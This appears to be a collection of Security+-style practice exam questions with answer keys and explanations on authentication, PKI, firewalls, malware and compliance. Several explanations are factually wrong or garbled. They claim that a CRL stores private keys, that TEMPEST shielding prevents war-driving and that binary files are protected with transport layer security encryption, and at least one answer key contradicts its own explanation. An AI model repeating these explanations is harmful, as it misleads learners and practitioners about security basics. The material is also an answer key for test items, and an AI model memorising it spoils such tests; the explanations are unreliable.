A. 802.1X secure network access can be used to connect to wireless networks. It can use EAP, CHAP, or PEAP authentication. It can also utilize centralized authentication such as RADIUS. Though the scenario does not say so specifically, you can assume an 802.1X/PEAP/RADIUS configuration. If the RADIUS certificate expires, none of the wireless users would be able to connect. Incorrect answers: The DNS server is a separate service altogether. If it was overwhelmed (perhaps by a DDoS attack), then DNS queries would fail, but those queries would be to items on the domain, or websites, and so on. It should not affect the wireless network. Too many incorrect authentication attempts could cause some users to be disabled, but most likely this will be a temporary loss of service. In the scenario, all employees report no service to the wireless network. The scenario also states the technician verified that there were no outages, so the IDS should not have disabled the wireless network.

Which of the following security applications cannot proactively detect computer anomalies? NIDS HIPS Antivirus software Personal software firewall

A. A NIDS, or network intrusion detection system, cannot proactively detect computer anomalies. It is deployed to the entire network and looks for a network intrusion, not intrusions to individual computers. See the section "NIDS Versus NIPS" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A HIPS (host-based intrusion prevention system), antivirus software, and personal software firewalls can all be loaded on an individual computer and can be updated as well. These can proactively detect computer anomalies.

The IT director tasks you to set up a backup plan to ensure that your organization can be back up and running within hours if a disaster occurs. Which of the following should you implement? Hot site Redundant servers Cold site Tape backup

A. A hot site is a backup site that can be running within hours, perhaps immediately. It contains computers, phones, servers, and a complete backup of the data so that employees can begin working immediately when they enter the hot-site building. This is sometimes referred to as a hot-backup site.

E-mail servers can be maliciously exploited in many ways, for example, spoofing e-mail messages. Which of the following is a common component that attackers would use to spoof e-mails? Open relay Web proxy Session hijacking Logic bomb

A. An open relay is an invitation for attackers to send out spoofed e-mails and spam. These relays should be closed on SMTP servers so that only authenticated users can gain access to them. See the section "Preventing and Troubleshooting Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: Web proxies are go-betweens for clients on the network and the web servers that they want to connect to. The web proxy stores web page information so that the organization can save Internet bandwidth and the clients can get their information faster. Session hijacking is the exploitation of a computer session in an attempt to gain unauthorized access to data services or other resources on the computer. Logic bombs are code that has in some way been inserted into software, initiating malicious functions when specific criteria are met.

Which of the following is the most complicated centralized key management scheme? Asymmetric Symmetric Whole disk encryption Steganography

A. Asymmetric systems such as PKI (public key infrastructure) have a complicated centralized key management scheme. A system such as PKI creates an asymmetric key pair that includes a public key and a private key. The private key is kept secret, whereas the public key can be distributed. See the section "Cryptography Concepts" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: Symmetric systems use two keys, but they are the same type of key, usually identical, thus the name symmetric. Whole disk encryption schemes such as BitLocker use trusted platform modules (TPMs) that store the symmetric encrypted keys; these keys are often based on the Advanced Encryption Standard (AES). Steganography is the science of hiding messages within files and doesn't use keys.

Your company has a mix of on-premises infrastructure and cloud-provider infrastructure and needs to extend the reach of its security policies beyond the internal infrastructure. Which of the following would be the BEST solution for the company to consider? CASB SaaS PaaS MaaS

A. If there is a mix of on-premises infrastructure and cloud-provider infrastructure, a company might consider a cloud access security broker (CASB). A CASB is a software tool or service that acts as the gatekeeper between the two, allowing the company to extend the reach of its security policies beyond its internal infrastructure. See the section "Cloud Security and Server Defense" in Chapter 6, "Network Design Elements," for more information. Incorrect answers: Software as a service (SaaS) is when users access applications over the Internet that are provided by a third party. The applications need not be installed on the local computer. Platform as a service (PaaS) is a service that provides various software solutions to organizations, especially the ability to develop applications in a virtual environment without the cost or administration of a physical platform. PaaS is used for easy-to-configure operating systems and on-demand computing. Monitoring as a service (MaaS) is a framework that facilitates the deployment of monitoring within the cloud in a continuous fashion.

Which of the following network authentication protocols uses symmetric key cryptography, stores a shared key for each network resource, and uses a Key Distribution Center (KDC)? Kerberos RADIUS TACACS+ PKI

A. Kerberos is an authentication protocol that enables computers to prove their identity to each other in a secure manner; it is quite often used in a client/server environment such as a Microsoft domain. Kerberos is the only answer listed that uses a Key Distribution Center. It uses two-way authentication, otherwise known as mutual authentication.

You have been commissioned by a customer to implement a network access control model that limits remote users' network usage to normal business hours only. You create one policy that applies to all the remote users. What access control model are you implementing? Role-based access control Mandatory access control Discretionary access control Rule-based access control

A. Role-based access control (RBAC) works with sets of permissions; each set of permissions constitutes a role. Users are assigned to roles to gain access to resources. Examples of user groups that are assigned to roles include remote users, extranet users, guests, and so on. In this question, the remote users are the group that has been assigned a role that enables them to access the network only during normal business hours. See the section "Access Control Models Defined" in Chapter 11, "Access Control Methods and Models," for more information. Role-based access control should not be confused with rule-based access control, which is a type of mandatory access control (MAC). MAC is an access control policy determined by a computer system and not by a user or owner. Discretionary access control (DAC) is generally determined by the owner of a resource.

As a security administrator, you must be constantly vigilant and always be aware of the security posture of your systems. Which of the following supports this goal? Establishing baseline reporting Disabling unnecessary services Training staff on security policies Installing anti-malware applications

A. The key words of the question are "security posture." One of the best methods of monitoring the security posture of your systems is establishing baseline reporting. Baselining is the process of measuring changes in networking, hardware, software, and so on. Creating a baseline consists of selecting something to measure and measuring it consistently for a period of time. It is this baselining (and automated reporting with baselining tools such as Performance Monitor or Wireshark) that allows you to be vigilant and watch over your network carefully in real time. See the section "Monitoring Methodologies" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Disabling unnecessary services is an important security concept, but this refers to hardening the system, and reducing the attack surface. Training staff on security policies is educating the user and is extremely important when attempting to reduce the consequences of successful social engineering attacks. Installing anti-malware applications also hardens the system, and secures it in general against viruses, worms, Trojans, and other forms of malware.

You are the network security administrator for your organization. You are in charge of deploying 50 new computers on the network. Which of the following should be completed first? Apply a baseline configuration Install operating system updates Install the latest spyware Install a spreadsheet program

A. When installing 50 new computers (or any number of computers) on a network, you should first apply the baseline configuration from information and tests that you have previously collected. This will ensure that all computers comply with the same configuration. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: After applying the baseline configuration, you would install the latest operating system updates, followed by antivirus and anti-spyware programs, and finally applications such as word processors and spreadsheets.

You want to secure data passing between two points on an IP network. What is the best method to protect from all but the most sophisticated APTs? Transport encryption Key escrow Block ciphers Stream ciphers

A. When securing data that passes between two points on an IP network, you need some kind of transport layer communications encryption protocol. Examples include Transport Layer Security (TLS) and Secure Sockets Layer (SSL). Protocols such as these operate on layer 4 of the OSI model; they encrypt the transmissions between IP-based computers, protecting the session data from eavesdroppers, and are thus known as transport layer encryption protocols. They make use of X.509 certificates and a public key infrastructure (PKI). These protocols can utilize block ciphers (for instance, Advanced Encryption Standard [AES]) or stream ciphers (for example, RC4), but more commonly use the former. By the way, APT stands for advanced persistent threat, a group of continuous hacking processes often performed by multiple attackers. APTs are carried out by knowledgeable groups of people using very sophisticated attacks; often they reside in another country. See the section "Security Protocols" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: Key escrow is when decryption keys are held in escrow (placed in the custody of a third party), in the case that they are needed to gain access to data. They are common in PKI systems. This is a concept of where keys are stored, but not a method of encrypting data transmissions between two hosts. The answers "block ciphers" and "stream ciphers" are not specific enough. You can use either as part of an overall solution to secure data passing between two points on an IP network, but more often than not you will encounter SSL certificates that make use of RSA (for the key exchange) and AES (the actual cipher used for the transfer of session data).

There is an important upcoming patch to be released. You are required to test the installation of the patch a dozen times before the patch is distributed to the public. What should you perform to test the patching process quickly and often? Create a virtualized sandbox and utilize snapshots Create an image of a patched PC and replicate it to the servers Create an incremental backup of an unpatched PC Create a full disk image to restore after each installation

A. You should create a virtualized sandbox - a place where you can work with many virtualized images and test them frequently. By utilizing snapshots, you are taking limited images of the systems at a specific point, most likely before and after the patch installation. The snapshot is a set of information at a particular point in time, and not necessarily an entire image. Incorrect answers: Creating a single image of a patched PC is not enough. Good patch management requires that the security administrator do thorough testing; in the scenario you are required to test the patch a dozen times. Incremental backups are used as a part of an efficient backup plan that usually includes incremental and full backups. But this - and the fact that the PC is unpatched - does not help a security administrator to test the patching process quickly and often. A full disk image after each patch installation could be very time consuming. Instead, snapshots are the better option.

Which of the following attacks involve intercepting a session and modifying network packets? Select 2 answers TCP/IP hijacking Denial of service Man-in-the-middle attack DNS poisoning Null session

AC. TCP/IP hijacking and man-in-the-middle attacks are both examples of attacks that involve intercepting a user's session and modifying network packets. TCP/IP hijacking is when a hacker takes over a TCP session between two computers without the need of a cookie. Man-in-the-middle attacks intercept all data between the client and the server; if successful, all communications now go through the MITM attacking computer. These are both types of hijacking; other types of hijacking include session theft and blind hijacking.

Your network is a Windows domain controlled by a Windows Server domain controller. Your goal is to configure user access to file folders shared to the network. In your organization, directory access is dependent upon a user's role in the organization. You need to keep to a minimum the administrative overhead needed to manage access security. You need to be able to quickly modify a user's permissions if that user is assigned to a different role. A user can be assigned to more than one role within the organization. What solutions should you implement? (Select the two best answers.) Create security groups and assign access permissions based on organizational roles Place users in OUs based on organizational roles Create an OU for each organizational role and link GPOs to each OU Place users' computers in OUs based on user organizational roles Assign access permission explicitly by user account

AC. The first thing you should do as a network administrator is create organizational units (OUs) for each of the departments in your organization; this helps to categorize and classify where users will ultimately end up. Each OU will be considered a different role. Next on the list is creating Group Policy objects (GPOs), modifying the security policies, and applying those to each individual OU. Then, you should create the users and place them in their correct OUs according to the department that they will be working in and the role that they will play. Finally, you should create security groups, add users to the appropriate security group or groups, and apply access permissions to the groups, instead of the users, to save time and keep administrative overhead to a minimum. Incorrect answers: Placing the user's computer in an OU could cause issues when it comes time to move a user account to another OU; the computer account would need to be moved with it. Access permissions should not be assigned solely by the individual user account; this would increase administrative overhead by a great deal.

You have been tasked with sending a decommissioned SSL certificate server's hard drives to be destroyed by a third-party company. What should you implement before sending the drives out? (Select the two best answers.) Disk wiping Data retention policies Removable media encryption Full disk encryption Disk hashing

AD. You don't want anyone else to get hold of your SSL certificates, even if they are expired. The best solution in the scenario is to either destroy the drives yourself or store them in a secure location for a period of time. However, if you are sending them to a third party for destruction, the best option would be to fully wipe the drives, sanitizing them with powerful software and strong methods such as the Gutmann method. Barring that, you would want to consider full disk encryption (FDE) that utilizes AES or another powerful cipher. This way, the third party, and anyone else between you and the third party, will not be able to learn the RSA keys that the certificates are based on. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: A data retention policy states how long data must be stored by an organization. If the drives are going to another company, then this policy is moot in this case. The server's hard drives that are referred to in the question are most likely internal drives, so removable media encryption (for things such as USB flash drives) has no bearing here. Disk hashing is not necessary. You are not interested in the data anymore, so there is no reason to hash it.

What are the best ways for a web programmer to prevent website application code from being vulnerable to XSRF attacks? (Select the two best answers.) Validate input on the client and the server side Ensure HTML tags are enclosed within angle brackets Permit URL redirection Restrict the use of special characters in form fields Use a web proxy to pass website requests between the user and the application

AD. Input validation is extremely important when it comes to website attacks such as XSRF (cross-site request forgery) and cross-site scripting (XSS) attacks. Forms and other documents should be validated on the client side and the server side (if at all possible). Special characters should be restricted and sanitized within form fields and URLs. This is all part of secure coding.

You have been tasked with blocking DNS requests and zone transfers coming from outside IP addresses. You analyze your organization's firewall and note that it implements an implicit allow and currently has the following ACL configured for the external interface:

permit TCP any any 80
permit TCP any any 443

Which of the following rules would accomplish your goal? (Select the two best answers.) Change the implicit rule to an implicit deny Remove the current ACL Add the following ACL at the top of the current ACL: deny TCP any any 53 Add the following ACL at the bottom of the current ACL: deny ICMP any any 53 Apply the current ACL to all interfaces of the firewall Add the following ACL at the bottom of the current ACL: deny IP any any 53

AF. First of all, a firewall should not be set with an implicit allow by default. That would allow just about any kind of traffic through the firewall. Plus, it would make the already configured ACL unnecessary. So, the firewall should be changed to an implicit deny for all connections. That is the default setting for firewalls, and it disallows all traffic coming from the Internet through the inbound interface (unless otherwise stated with an ACL). Second, you would add the ACL deny IP any any 53 at the bottom of the current ACL. This will deny any DNS traffic (because DNS uses port 53), including DNS requests and zone transfers. It does this for any type of IP connection (including TCP and UDP) and for all IP addresses on the local and remote ends. Incorrect answers: Removing the current ACL would do nothing because the firewall is currently configured with an implicit allow. However, if you changed that default rule to an implicit deny and removed the ACL, Internet users would no longer be able to connect to the web server (which uses ports 80 and 443). That doesn't solve your problem; in fact, it creates another one. It doesn't really matter where you place the new ACL to block DNS requests; top or bottom makes no difference, because when you are finished, the firewall will have an implicit deny and then two separate ACLs that pretty much work independently of each other. However, you would normally place the ACLs in order, and this would mean placing the new ACL below the first. The key with the other two possible ACLs in the answers is that they are not blocking enough traffic. One shows TCP, which is not enough; you need to block TCP and UDP, and this is done by simply stating IP. ICMP is not correct, because that deals with layer 3 testing, such as the ping utility.

In this scenario, your organization and a sister organization use multiple certificate authorities (CAs). Which component of PKI is necessary for one CA to know whether to accept or reject certificates from another CA? CRL Key escrow RA Recovery agent

An RA is a registration authority used to verify requests for certificates from a certificate authority or multiple certificate authorities. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: A CRL is a certificate revocation list; if for some reason a certificate cannot be verified by any parties involved and the issuer of the certificate confirms this, the issuer needs to revoke the certificate. The certificate is placed in the CRL that is published. Key escrow is when certificates are held in case third parties need them in the future. Recovery agents recover certificates that were corrupted or lost.

(messer) Which of these access control models is most associated with Windows Groups? Rule-based access control Role-based access control File system security Mandatory access control Attribute-based access control

B

For a user to obtain a certificate from a certificate authority, the user must present two items. The first is proof of identity. What is the second? Password Public key Private key Authentication

B

Your network has a DHCP server, AAA server, LDAP server, and e-mail server. Instead of authenticating wireless connections locally at the WAP, you want to utilize RADIUS for the authentication process. When you configure the WAP's authentication screen, what server should you point to, and which port should you use? The DHCP server and port 67 The AAA server and port 1812 The LDAP server and port 389 The e-mail server and port 143

B

Your organization has decided to move large sets of sensitive data to a SaaS cloud provider in order to limit storage and infrastructure costs. Your CIO requires that both the cloud provider and your organization have a clear understanding of the security controls that will be implemented to protect the sensitive data. What kind of agreement is this? SLA ISA MoU BPA

B. An ISA is an interconnection security agreement. It is an agreement that is established between two (or more) organizations that own and operate connected IT systems and data sets. Its purpose is to specifically document the technical and security requirements of the interconnection between the organizations. This is the type of agreement you need in this scenario because the data is sensitive and the CIO requires that there is a clear understanding of security controls to be implemented and agreed upon. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: An SLA (service level agreement) is a contract between a service provider and a customer that specifies the nature of the service to be provided and the level of service that the provider will offer to the customer. It can be a very basic agreement, or it could also state the technical and performance parameters, but it will probably not include any specific security controls. An MoU is not an agreement at all, but a memorandum of understanding between two organizations or government agencies. It does not specify any security controls either. A BPA (business partners agreement) is a type of contract that can establish the profits each partner will get, what responsibilities each partner will have, and exit strategies for partners. Note that you might see the acronym BPA used for other things as well in the business and IT worlds.

You are a security administrator for a midsized company that uses several applications on its client computers. After the installation of a specialized program on one computer, a software application executed an online activation process. Then, a few months later, the computer experienced a hardware failure. A backup image of the operating system was restored on a newer revision of the same brand and model computer. After that restoration, the specialized program no longer works. Which of the following is the most likely cause of the problem? The restored image backup was encrypted with the wrong key. The hash key summary of the hardware and the specialized program no longer match. The specialized program is no longer able to perform remote attestation due to blocked ports. The binary files used by the specialized program have been modified by malware.

B. Some software activations are based on a hardware key, or a hardware key and a software key that are compared. The key is normally a hash value (computed with either MD5 or SHA-256, for instance), and if the hash values don't match, then the specialized program won't be able to execute the online activation process, which is required because the image was restored to the new computer (with a new and different key). This of course is the most likely cause, but not the only possible reason for why the specialized program stopped functioning. See the section "Hashing Basics" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: If the image file to be restored was encrypted with the wrong key, then you wouldn't be able to complete the restoration, and the computer would not function. In trusted computing, remote attestation is when a client computer authenticates its hardware and software configuration to a remote server with the goal being to determine the level of trust - often using a PKI. Remote attestation might indeed be failing, but it is less likely being caused by blocked ports. The software configuration of the affected computer should not have changed, even after the restoration. Plus, the scenario doesn't mention any network changes, so the configuration of ports, ACLs, and so on should be the same. The least likely answer is that the binary files of the specialized program have been modified by malware. Malware can target binary files, but it is less common compared to other types of files such as executables. Many application developers will protect their binary files with transport layer security encryption, making them difficult (if not impossible) to modify.

You want to prevent any intrusions to a single computer. What is the best solution? VPN concentrator Host-based firewall Host-based intrusion detection Network firewall

B. A host-based firewall is the best solution to prevent intrusions to a single computer. Firewalls can block various types of traffic that might include attacks or other intrusions. See the section "Implementing Security Applications" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: A VPN concentrator allows remote access for multiple users. Host-based intrusion detection (via a HIDS) will locate an intrusion but not prevent it; to prevent it you would want a host-based intrusion prevention system (HIPS). A network firewall can help to protect an entire network but will not be the best solution if you were only trying to prevent intrusions to a single computer. The host-based firewall will have definitions that are more specific to the types of attacks that might be perpetrated on a single local computer.

Which of the following methods should you use to fix a single security issue on a computer? Configuration baseline Patch Service pack Patch management

B. A patch or hotfix is designed to fix one security issue on a computer. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: A configuration baseline is a set of information about a particular process on a computer; it is what is used to compare future performance analyses. On older Windows systems, service packs fix multiple security issues and update the system in other ways. Patch management is the distribution and monitoring of patches installed to multiple computers.

You have been asked by an organization to help correct problems with users unknowingly downloading malicious code from websites. Which of the following should you do to fix this problem? Install a network-based intrusion detection system Disable unauthorized ActiveX controls Implement a policy to minimize the problem Use virtual machines

B. ActiveX controls can be built directly into websites and can contain malicious code that can be easily downloaded by users without their knowledge. ActiveX controls can be disabled in whole or in part within the browser and can also be controlled as add-ons. See the section "Securing the Browser" in Chapter 5, "Application Security," for more information. Incorrect answers: A NIDS can possibly defend against malicious ActiveX controls to a certain extent, but you should not solely depend on it. Implementing policies is always a good idea, but you don't want to minimize the problem; you want to fix it. The use of virtual machines works well to isolate problems that might occur from ActiveX controls, but it does not fix the problem as far as downloading the malicious code.

Which device is used to encrypt the authentication process? WPA HSM Enigma machine Smart card

B. An HSM (hardware security module) is a physical device that acts as a secure cryptoprocessor. It is used for the digital signing of data and login/authentication processes. See the section "Securing Computer Hardware and Peripherals" in Chapter 3, "Computer Systems Security Part II," for more information. Incorrect answers: WPA (Wi-Fi Protected Access) is a wireless protocol. An Enigma machine is a machine that was used in World War II for the encryption/decryption of secret messages. Smart cards are used to authenticate individuals, but an HSM offers faster software encryption.

Of the following, which type of device attempts to serve client requests without the user actually contacting the remote server? IP proxy HTTP proxy Firewall DMZ

B. An HTTP proxy caches information from a web server for a set amount of time. This way an organization can save bandwidth, and the users can get their web pages quicker. An HTTP proxy is also known as a caching proxy. See the section "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: An IP proxy secures a network by keeping the computers behind it anonymous, usually through the use of network address translation (NAT). A firewall protects a network from external attack. A DMZ, or demilitarized zone, is an area between the LAN and the Internet used to store servers that serve information to Internet users.

What are LDAP and Kerberos commonly used for? To sign SSL wildcard certificates To utilize single sign-on capabilities To perform queries on a directory service To store usernames and passwords in a FIM system

B. Both LDAP and Kerberos can be used for single sign-on (SSO). This eases the burden on users of having to remember different usernames and passwords and allows a single login to multiple systems. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: A CA is used to sign certificates, including wildcard certificates. Queries on a directory service can be made with LDAP, but not with Kerberos. SSO is a derivative of federated identity management (FIM), but FIM will be its own system, altogether separate from LDAP and Kerberos.

Which of the following uses Transport Layer Security and does not work well in enterprise scenarios because certificates must be configured or managed on both the client side and server side? Transitive trust EAP-TLS EAP-TTLS EAP-FAST Kerberos

B. EAP-TLS uses Transport Layer Security, which is a certificate-based system that does enable mutual authentication. This does not work well in enterprise scenarios because certificates must be configured or managed on the client side and server side. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: A transitive trust is where two networks (or more) have a relationship such that users logging in to one network get access to data on the other. EAP-TTLS uses Tunneled Transport Layer Security and is basically the same as TLS except that it is done through an encrypted channel, and it requires only server-side certificates. EAP-FAST uses a protected access credential instead of a certificate to achieve mutual authentication. FAST stands for Flexible Authentication via Secure Tunneling. Kerberos is an excellent (and often used) method of authentication for the enterprise. It can work over TLS, but that is not necessary.

Which of the following is a step in deploying a WPA2-Enterprise wireless network? Install a DHCP server on the authentication server Install a digital certificate on the authentication server Install an encryption key on the authentication server Install a token on the authentication server

B. If you are running a WPA2-Enterprise wireless network, then the wireless access point (WAP) will need to access a RADIUS server for the authentication portion of the wireless connection. This scenario calls for a digital certificate to be loaded on the RADIUS server.

Your organization has several conference rooms with wired RJ45 jacks that are used by employees and guests. The employees need to access internal organizational resources, but the guests only need to access the Internet. Which of the following should you implement? VPN and IPsec 802.1X and VLANs Switches and a firewall NAT and DMZ

B. In this question the RJ45 wired jacks are the key. You don't want just anyone connecting to the wired jacks and having access to internal resources. So, implementing 802.1X and VLANs is an excellent solution. This will authenticate computers; only systems with the proper 802.1X adapter will be authenticated to internal resources. Other computers that connect will only be able to connect to the Internet. The virtual LAN can be port-based, with a VLAN per conference room, or perhaps protocol-based, defining which computers are allowed access to internal resources and which are allowed access to the Internet only. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: A virtual private network (VPN) is used so that remote users can gain access to the network. The scenario speaks only to localized conference rooms and resources, so a VPN (and the supporting IPsec used in L2TP connections) is not necessary. The organization will most likely have at least one switch and firewall already. However, the switch can be used as the authenticator of the 802.1X system. NAT (network address translation) is used in IPv4 networks to mask internal IP addresses when they access the Internet. This will most likely already be implemented by default, so any guests accessing the Internet will enjoy the security benefits of NAT. However, a demilitarized zone (DMZ) has little to do with the scenario; this is when servers (such as WWW and FTP) are placed in an area outside the LAN but still within the organization's network, making it easier for people on the Internet to access them.

A client contracts you to prevent users from accessing inappropriate websites. Which of the following technologies should you implement? NIDS Internet content filter Honeypot IP proxy

B. Internet content filters prevent users from accessing inappropriate websites. Quite often they are built into caching proxies; however, IP proxies are used to enable the connection of many hosts on a LAN through one IP address out to the Internet. See the section "Firewalls and Network Security" in Chapter 8, "Network Perimeter Security," for more information. Incorrect answers: A NIDS, or network intrusion detection system, can detect attacks on the network and alert a network administrator if they occur. A honeypot is used to attract and trap attackers on the network for further analysis.

Which of the following tools can be used to check network traffic for clear-text passwords? Password cracker Protocol analyzer Port scanner Performance monitor

B. Protocol analyzers can be used to check for clear-text passwords. If a password is sent by a client computer (for example, from Outlook), it will be sent by default as clear text. A protocol analyzer can look inside packets to locate clear-text passwords. See the section "Using Tools to Monitor Systems and Networks" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: Password-cracking programs are used to analyze, recover, or crack passwords. Port scanners are used to find vulnerabilities in the form of open ports on servers and other network devices. A performance monitor is used to analyze the performance of a server through monitoring the CPU, RAM, hard drive, and so on.

Which of the following algorithms is used by the protocol TLS to establish a session key? AES RSA RC4 HTTPS SSL

B. RSA is the asymmetric cryptographic algorithm used by TLS (Transport Layer Security) to establish a session key. See the section "Encryption Algorithms" in Chapter 14, "Encryption and Hashing Concepts," for more information. Incorrect answers: TLS is the successor to SSL (Secure Sockets Layer) that can use RSA or Diffie-Hellman for key exchange as well as AES and RC4 for the encryption of the rest of the session. HTTPS is the web-based secure protocol that makes use of TLS (or SSL), which then makes use of RSA for the key exchange at the start of a session.

You are attempting to apply corporate security settings to a workstation. Which of the following would be the best solution? Hotfix Security template Patch Services.msc

B. Security templates can be applied to computers to configure many rules and policies at once. These security templates will have many rules defining group policies and are common in corporate environments.

In a secure environment, which authentication mechanism performs better? RADIUS because it encrypts client/server passwords TACACS+ because it encrypts client/server negotiation dialogs TACACS+ because it is a remote access authentication service RADIUS because it is a remote access authentication service

B. TACACS+ (Terminal Access Controller Access-Control System Plus) has a few advantages over RADIUS (Remote Authentication Dial-In User Service). It encrypts the initial negotiation between the remote client and the server. It also separates authentication and authorization into two separate functions that introduce another layer of security. Finally, it offers more types of authentication requests than RADIUS. See the section "Authentication Models and Components" in Chapter 10, "Physical Security and Authentication Models," for more information. Incorrect answers: RADIUS is more common in Windows environments, whereas TACACS+ is used in a variety of environments. So a security administrator should analyze the IT environment carefully before implementing either of these remote authentication systems.

Your Internet café operates a public wireless hotspot. Which of the following should you implement? Disable the SSID Open system authentication MAC filter Reduce the power level

B. The best answer listed is to use open system authentication. In a public hotspot wireless network, this means that anyone can connect as long as they know the password or passphrase. You could also utilize a captive portal, which forces the wireless client to authenticate via a special web page and possibly supply an e-mail address as part of the authentication process. See the section "Securing Wireless Networks" in Chapter 9, "Securing Network Media and Devices," for more information. Incorrect answers: Disabling the SSID would make it difficult for a computer to find the wireless network, and therefore difficult (if not impossible) for patrons to use the Internet. A MAC filter would be very inefficient as the proprietor of the establishment would need to find out the MAC address of each person coming through the door. Reducing the WAP power level is a good way to reduce the chances of war-driving, but isn't necessary in this scenario, though it is a good practice.

You suspect that files are being illegitimately copied to an external location. The file server that the files are stored on does not have logging enabled. Which log should you access to find out more about the files that are being copied illegitimately? DNS log Firewall log Antivirus log System log

B. The firewall log can help you find out whether files are being illegitimately copied to an external location. This is the only log listed that can give you any information about files being copied to an external or remote location. See the section "Conducting Audits" in Chapter 13, "Monitoring and Auditing," for more information. Incorrect answers: The DNS log can help you find out whether unauthorized zone transfers or DNS poisoning has occurred. The antivirus log shows what viruses have been detected and quarantined on a system. The System log is a log file within the Event Viewer that provides information about the operating system and device drivers.

Which of the following types of keys are stored in a CRL? Private keys only TPM keys Public and private keys Public keys only

C. A CRL, or certificate revocation list, stores revoked certificates that contain both public and private keys associated with the certificate. This is common within a PKI, which is asymmetric, using private and public keys. See the section "Public Key Infrastructure" in Chapter 15, "PKI and Encryption Protocols," for more information. Incorrect answers: TPMs, trusted platform modules, use one type of key, usually secret and private.

Virtualization is a broad term that includes the use of virtual machines and the abstraction of computer resources. Which of the following is the best security reason for using virtualization of network servers? To centralize patch management To isolate network services and roles To add network services To analyze network traffic

B. Virtualization is the creation of a virtual entity as opposed to an actual server or operating system. The most common type is the virtual machine that runs an entire operating system virtually within the original operating system of the computer. The best security reason for implementing virtualization is to isolate different services and roles. See the section "Virtualization Technology" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Patch management centralization is done to secure all the client operating systems on the network and make sure that they are up to date. Although network services can be added through the use of virtualization, it is the specific concept of isolating those additional network services that makes virtualization secure. The analysis of network traffic can be done with a protocol analyzer, otherwise known as a network sniffer.

Your organization does business in a TEMPEST-certified building. What attack does this help to prevent? Weak encryption War-driving Bluejacking Bluesnarfing

B. War-driving can be prevented by using TEMPEST-certified techniques. War-driving is when a person attempts to access a company's wireless network from a laptop within their vehicle.

What are kernel-level rootkits designed to do to a computer? (choose 2) Make a computer susceptible to pop-ups Extract confidential information Hide evidence of an attacker's presence Hide backdoors into the computer Crack the user's password

BC. Rootkits in general are designed to gain administrator access while not being detected. Kernel-level rootkits will change code within the operating system and possibly device drivers, enabling the attacker to execute with the same privileges as the operating system. This type of rootkit allows for unrestricted security access. See the section "Delivery of Malware" in Chapter 2, "Computer Systems Security Part I," for more information. Incorrect answers: If a computer displays excessive pop-ups, it could be a sign of a virus or spyware (or just poor browsing habits). Hiding backdoors into a system would be a decent way of blocking remote access Trojans (RATs) and some rootkits. Cracking the user's password is something done by a password-cracking program.

Which of the following should be performed on a computer to protect the OS from malicious software? (Select 2 answers) Install a perimeter firewall Update HIPS signatures Update NIDS signatures Disable unused services Disable DEP settings

BD. An individual operating system should be protected by disabling unused services, and by updating any host-based intrusion detection systems or intrusion prevention systems. See the section "Hardening Operating Systems" in Chapter 4, "OS Hardening and Virtualization," for more information. Incorrect answers: Since we're talking about a single computer, network intrusion detection systems and perimeter firewalls are not required. DEP stands for data execution prevention and does not apply to this scenario.

Your organization must achieve compliance for PCI and SOX. Which of the following would best allow the organization to achieve compliance and ensure security? (Select the three best answers.) Establish a company framework Compartmentalize the network Centralize management of all devices on the network Apply technical controls to meet compliance regulations Establish a list of users that must work with each regulation Establish a list of devices that must meet regulations

BDF. Of the listed options, the best ones for achieving compliance with PCI (Payment Card Industry) and SOX (Sarbanes-Oxley) regulations include the following: 1) Compartmentalize the network - divvy up the network with methods such as VLANs, subnetting, DMZs, whatever security boundary necessary to protect servers and clients that deal with sensitive data. 2) Apply technical controls to meet compliance regulations - for example, vulnerability management, monitoring, protecting data, and so on. 3) Establish a list of devices that must meet regulations: Any devices and computers that will have payment info, health info, or PII of any kind flowing through them should be analyzed, secured, and continually monitored. PCI compliance requirements can be summed up as the following: Protect cardholder data Build and maintain a secure network Maintain an information security policy Maintain a vulnerability management program Implement strong access control measures Regularly monitor and test systems and networks See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Establish a company framework is somewhat vague but could refer to creating an IT security framework. This is a very good idea, but it is more of a high-level plan on how to execute actual procedures and policies, and not the procedures and policies themselves. Centralizing management of all devices might be a good idea from a management perspective, but for security, certain devices will no doubt need to be compartmentalized. Establishing a list of users that work with each regulation is a good idea, but not as important as the technical controls previously mentioned. Note: Remember to familiarize yourself with whatever policies and procedures your organization employs, whether they are related to PCI, SOX, ISO, or other compliance and regulatory methods.

Which of the following types of firewalls provides inspection of data at layer 7 of the OSI model? Network address translation Stateful inspection Application-proxy Circuit-level gateway

C

Your boss has tasked you with ensuring that reclaimed space on a hard drive has been sanitized while the computer is in use. What job should you perform? Individual file encryption Full disk encryption Cluster tip wiping Storage retention

C. A cluster tip is the last portion of a hard drive's cluster that is not used by a file. Often, files take up more than a single cluster. The cluster remainders don't get erased by default, but could possibly contain data remanence. So, some disk cleanup programs contain an option to wipe the cluster tips, thus better sanitizing the drive. This can even be performed while the computer is in use. See the section "Legislative and Organizational Policies" in Chapter 18, "Policies and Procedures," for more information. Incorrect answers: Encryption of any type does not sanitize the drive. Storage retention and data retention usually manifest themselves as policies. For example, an organization might have a storage retention policy that states a hard drive must be kept in storage for a minimum of three years before being fully sanitized and/or destroyed. This is common in high-security environments where data is extremely confidential, or where auditing and other logging information must be kept for a specific amount of time.

